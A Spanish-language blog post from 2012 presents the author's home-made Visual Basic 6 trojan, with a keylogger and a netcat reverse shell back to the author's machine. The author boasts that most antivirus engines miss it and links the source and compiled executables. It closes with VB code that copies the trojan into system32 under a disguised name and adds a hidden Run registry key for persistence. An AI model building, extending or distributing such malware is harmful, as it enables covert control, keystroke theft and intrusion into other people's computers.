jueves, 8 de marzo de 2012

TR0j4neo v5.6 source code vb



Bueno últimamente he estado trabajando en un troyano en visual basic 6. Me dio bastantes problemas a la hora de realizar las conexiones pero aquí esta:








De momento tiene pocas funciones, poco poco iré añadiendo mas:


-Abrir CD 
-Cerrar CD
-Abrir Página (google.com)
-Mandar error
-Apagar pc
-Keylogger


Y la mas interesante


-Shell remota!!




Estuve mirando muchísimos tutoriales y información, pero al final di con la solución. Usé el sistema netcat para obtener la shell


Para todos los que no sepan lo que es aquí va un tuto:


http://foro.elhacker.net/tutoriales_documentacion/tutorial_de_netcat_pagravera_newbies-t65764.0.html

El netcat se encuentra en la carpeta del servidor del troyano, cuando se ejecuta el trojan se copia el netcat en system32 y cada vez que en mi cliente le doy a shell remota el server abre ese netcat y se conecta a mi pc que estara en modo escucha. 


Vamos a verlo:








Una vez estemos conectados le daremos a shell remota:






Y ya estamos dentro! 


La pega es que de momento solo admite una conexión, esto ya lo iremos solucionando.


En cuanto a los antivirus es detectado por 11/43


No es detectado ni por Avast, ni por AVG, ni por McAfee, ni por Panda ni por NOD32.


Aquí los resultados en virustotal:


https://www.virustotal.com/file/eadd0389aafc49025d7a2153d50882051eba5504cce33aeb49ac90c06caf3a43/analysis/1331224288/

También tiene NO-ip, para que no tengas que abrirlo cada vez que pones el troyano, aunque aun esta en pruebas, no se si funciona del todo bien.


Bueno sin enrollarme mas aquí dejo el source code y los .exe que he compilado, ademas de un pequeño curso para troyanos en VB:




http://www.mediafire.com/?52qpigol82rsy3i




Nota:


Al servidor le faltan un par de cosas, como agregarse al registro para iniciarse con windows y copiarse en otra carpeta, también le falta que el netcat se copie en system32.


Aquí va el code que teneis que añadir (falta lo del netcat):





FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\WINDOWS\system32\" & "ddlr32" & ".exe"




Shell ("cmd.exe /c Reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v ddlr32.exe /d C:\WINDOWS\system32\ddlr32.exe"), vbHide







1 comentario:

Comentar: